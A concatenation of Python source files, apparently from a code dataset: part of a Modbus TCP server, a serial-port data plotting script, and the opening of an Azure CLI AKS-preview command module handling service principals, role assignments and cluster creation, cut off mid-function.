def set_words(cls, address, word_list):
with cls.words_lock:
if (address >= 0) and (address + len(word_list) <= len(cls.words)):
cls.words[address: address + len(word_list)] = word_list
return True
else:
return None
class ModbusServer(object):
"""Modbus TCP server"""
class ModbusService(BaseRequestHandler):
def handle(self):
while True:
rx_head = self.request.recv(7)
# close connection if no standard 7 bytes header
if not (rx_head and len(rx_head) == 7):
break
# decode header
(rx_hd_tr_id, rx_hd_pr_id,
rx_hd_length, rx_hd_unit_id) = struct.unpack('>HHHB', rx_head)
# close connection if frame header content inconsistency
if not ((rx_hd_pr_id == 0) and (2 < rx_hd_length < 256)):
break
# receive body
rx_body = self.request.recv(rx_hd_length - 1)
# close connection if lack of bytes in frame body
if not (rx_body and (len(rx_body) == rx_hd_length - 1)):
break
# body decode: function code
rx_bd_fc = struct.unpack('B', rx_body[0:1])[0]
# close connection if function code is inconsistent
if rx_bd_fc > 0x7F:
break
# default except status
exp_status = const.EXP_NONE
# functions Read Coils (0x01) or Read Discrete Inputs (0x02)
if rx_bd_fc in (const.READ_COILS, const.READ_DISCRETE_INPUTS):
(b_address, b_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested bits
if 0x0001 <= b_count <= 0x07D0:
bits_l = DataBank.get_bits(b_address, b_count)
if bits_l:
# allocate bytes list
b_size = int(b_count / 8)
b_size += 1 if (b_count % 8) else 0
bytes_l = [0] * b_size
# populate bytes list with data bank bits
for i, item in enumerate(bits_l):
if item:
byte_i = int(i/8)
bytes_l[byte_i] = set_bit(bytes_l[byte_i], i % 8)
# format body of frame with bits
tx_body = struct.pack('BB', rx_bd_fc, len(bytes_l))
# add bytes with bits
for byte in bytes_l:
tx_body += struct.pack('B', byte)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# functions Read Holding Registers (0x03) or Read Input Registers (0x04)
elif rx_bd_fc in (const.READ_HOLDING_REGISTERS, const.READ_INPUT_REGISTERS):
(w_address, w_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested words
if 0x0001 <= w_count <= 0x007D:
words_l = DataBank.get_words(w_address, w_count)
if words_l:
# format body of frame with words
tx_body = struct.pack('BB', rx_bd_fc, w_count * 2)
for word in words_l:
tx_body += struct.pack('>H', word)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Single Coil (0x05)
elif rx_bd_fc is const.WRITE_SINGLE_COIL:
(b_address, b_value) = struct.unpack('>HH', rx_body[1:])
f_b_value = bool(b_value == 0xFF00)
if DataBank.set_bits(b_address, [f_b_value]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_value)
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Single Register (0x06)
elif rx_bd_fc is const.WRITE_SINGLE_REGISTER:
(w_address, w_value) = struct.unpack('>HH', rx_body[1:])
if DataBank.set_words(w_address, [w_value]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_value)
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Multiple Coils (0x0F)
elif rx_bd_fc is const.WRITE_MULTIPLE_COILS:
(b_address, b_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated coils
if (0x0001 <= b_count <= 0x07B0) and (byte_count >= (b_count/8)):
# allocate bits list
bits_l = [False] * b_count
# populate bits list with bits from rx frame
for i, item in enumerate(bits_l):
b_bit_pos = int(i/8)+6
b_bit_val = struct.unpack('B', rx_body[b_bit_pos:b_bit_pos+1])[0]
bits_l[i] = test_bit(b_bit_val, i % 8)
# write words to data bank
if DataBank.set_bits(b_address, bits_l):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Multiple Registers (0x10)
elif rx_bd_fc is const.WRITE_MULTIPLE_REGISTERS:
(w_address, w_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated words
if (0x0001 <= w_count <= 0x007B) and (byte_count == w_count * 2):
# allocate words list
words_l = [0] * w_count
# populate words list with words from rx frame
for i, item in enumerate(words_l):
w_offset = i * 2 + 6
words_l[i] = struct.unpack('>H', rx_body[w_offset:w_offset + 2])[0]
# write words to data bank
if DataBank.set_words(w_address, words_l):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
else:
exp_status = const.EXP_ILLEGAL_FUNCTION
# check exception
if exp_status != const.EXP_NONE:
# format body of frame with exception status
tx_body = struct.pack('BB', rx_bd_fc + 0x80, exp_status)
# build frame header
tx_head = struct.pack('>HHHB', rx_hd_tr_id, rx_hd_pr_id, len(tx_body) + 1, rx_hd_unit_id)
# send frame
self.request.send(tx_head + tx_body)
self.request.close()
def __init__(self, host='localhost', port=502, no_block=False, ipv6=False):
"""Constructor
Modbus server constructor.
:param host: hostname or IPv4/IPv6 address server address (optional)
:type host: str
:param port: TCP port number (optional)
:type port: int
:param no_block: set no block mode, in this mode start() return (optional)
:type no_block: bool
:param ipv6: use ipv6 stack
:type ipv6: bool
"""
self.host = host
self.port = port
self.no_block = no_block
self.ipv6 = ipv6
# set class attribute
ThreadingTCPServer.address_family = socket.AF_INET6 if self.ipv6 else socket.AF_INET
ThreadingTCPServer.daemon_threads = True
# init server
self._service = ThreadingTCPServer((self.host, self.port), self.ModbusService, bind_and_activate=False)
# set socket options
self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# TODO test no_delay with bench
self._service.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# add thread for no block mode
if self.no_block:
self._serve_th = Thread(target=self._service.serve_forever)
self._serve_th.daemon = True
def start(self):
# bind and activate
self._service.server_bind()
self._service.server_activate()
# serve request
if self.no_block:
self._serve_th.start()
else:
self._service.serve_forever()
|
plot_serial.py | #python 3.6.5
#matplotlib==3.0.3
#numpy==1.16.2
#pyserial==3.4
import time, threading
import numpy as np
from matplotlib.lines import Line2D
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import serial
import pylab
import struct
import string
import time
import queue
Baud = 115200 #波特率设置
Port_name = "COM3" # 端口名
Datanum = 2 #传入数据的数量
yMax =240 #图中y轴上限
yMin = -240 #图中y轴下限
x_span = 0.5 #横轴跨度
xMax = 1 #图中x轴上限
xMin = 0 #图中y轴下限
#xMin = xMax - x_span #
x_name = "Time" #设置x轴名称
y_name = "multi_val" #设置y轴名称
Title = "pic" #图像名称
line_name = ["X","Y"] #线名称
Color = ['red','orange','darkblue','darkslategray','deeppink','megenta'] #绘图线颜色
class Scope(object):
def __init__(self, ax, maxt=2, dt=0.002):
self.ax = ax
self.dt = dt
self.maxt = maxt
self.tdata = [0]
self.ydata = []
self.line=[]
for i in range(0,Datanum):
self.ydata.append([0]) #创建参数个数的子列表
for i in range(0,Datanum):
self.ax.plot(self.tdata, self.ydata[i])
for i in range(0,Datanum):
self.line.append(Line2D(self.tdata, self.ydata[i],color = Color[i]))
self.ax.add_line(self.line[i])
self.ax.set_ylim(yMin, yMax) #初始化y轴上下限
self.ax.set_xlim(0,xMax) #初始化x轴上下限
def update(self, data):
global yMax
global yMin
global xMax
global xMin
global x_span
#lastt = self.tdata[-1]
#if lastt > self.tdata[0] + self.maxt: # reset the arrays
#self.tdata = [self.tdata[-1]]
#self.ydata = [self.ydata[-1]]
#self.ax.set_xlim(self.tdata[0], self.tdata[0] + self.maxt)
#self.ax.figure.canvas.draw()
if data[0] == 0:
return self.line;
y = data[1]
t = self.tdata[-1] + self.dt
self.tdata.append(t) #增加数组元素
for i in range(0,Datanum):
self.ydata[i].append(y[i]) #增加数组元素
self.line[i].set_data(self.tdata, self.ydata[i])
if (y[i]) > yMax:
yMax = y[i] + 1
self.ax.set_ylim(yMin, yMax) #更新y轴上下限
self.ax.figure.canvas.draw()
elif (y[i]) < yMin:
yMin = y[i] - 1
self.ax.set_ylim(yMin, yMax)
self.ax.figure.canvas.draw()
if t > xMax: #更新x轴上下限
xMax = t + 0.5
#xMin = xMax - x_span
self.ax.set_xlim(xMin, xMax)
self.ax.figure.canvas.draw()
return self.line
def emitter(p=0.03):
if DataList.qsize() == 0:
yield [0,0]
else :
yield [1, DataList.get()]
def SerialDataRead():
while 1:
SerData = ser.read_until()
SerData = str(SerData)
SerData = SerData[2:-3].split()
try:
data = list(map(float, SerData))
except:
print("Wrong Format")
#print(data)
DataList.put(data)
def SerialPlot():
while 0:
while DataList.qsize() != 0:
a = DataList.get()
print(type(a))
print(a)
fig, ax = plt.subplots(figsize = (7, 7)) #修改图像大小,这里是700x700像素
scope = Scope(ax)
ani = animation.FuncAnimation(fig, scope.update, emitter, interval=10, blit=True)
#ax.xlabel(x_name)
#ax.ylabel(y_name)
#ax.title (Title)
#ax.legend(line_name)
plt.show()
if __name__ == "__main__":
ser = serial.Serial(Port_name, Baud)#设置端口,波特率,响应时间
DataList = queue.Queue()
ReadData = threading.Thread(target=SerialDataRead, name='ReadData')
Plot = threading.Thread(target=SerialPlot, name='Plot')
ReadData.start()
Plot.start()
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2022_01_02_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_snapshots_client(cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError("Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
enable_oidc_issuer=False,
crg_id=None,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
